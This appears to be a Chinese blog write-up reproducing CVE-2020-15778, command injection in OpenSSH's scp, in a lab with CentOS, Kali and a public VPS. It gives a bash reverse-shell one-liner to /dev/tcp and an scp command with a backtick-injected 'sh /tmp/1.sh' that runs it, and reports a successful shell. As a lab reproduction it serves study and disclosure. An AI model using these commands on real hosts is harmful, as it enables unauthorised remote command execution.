刚刚好这几遇见了不少OPENSSH命中该漏洞版本的就复现一下。
本文参考字节脉搏等 字节脉搏EXP调用失败可能为环境问题。
感谢福林表哥提供第二个exp 反弹shell成功。
01漏洞介绍CVE编号:CVE-2020-15778
发布时间:2020-07-24
危害等级:高危
漏洞版本:<= openssh-8.3p1
漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。
参考链接来自CNNVD:
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202007-1519
02环境准备一台centos7 一台kali 一台公网vps (反弹shell用)
03复现开始测试scp是否能连上 编写一个txt 然后连接环境
scp 1.txt root@IP:/tmp/1.txt | 测试传到tmp下1.txt 测试成功
编写反弹shell 语句 最简单的
bash -i >& /dev/tcp/IP/端口 0>&1
服务器监听端口
首先 需要给1.sh权限 直接777吧
然后首先需要把1.sh传上去 才可以进行下一步
调用字节脉搏的exp 报错的异常 有点看不懂
scp 1.sh root@IP:/’`sh /tmp/1.sh`’
然后联系了一下福林表哥 换了一个exp 成功 由于不确定是否是公开的先隐藏把
看公网服务器的监听 反弹shell成功
04实验总结个人看法 利用过于鸡肋 绕过拿到ssh密码了 一般是可以直连的,当然如果打CTF之类的比赛的话 当我没说
05安全建议官方尚未发布安全更新补丁密切关注厂商主页获取解决办法:
http://www.openssh.com/portable.html
如果对你有用 不如点个关注 转发一下文章欢迎大佬们加好友吹水聊天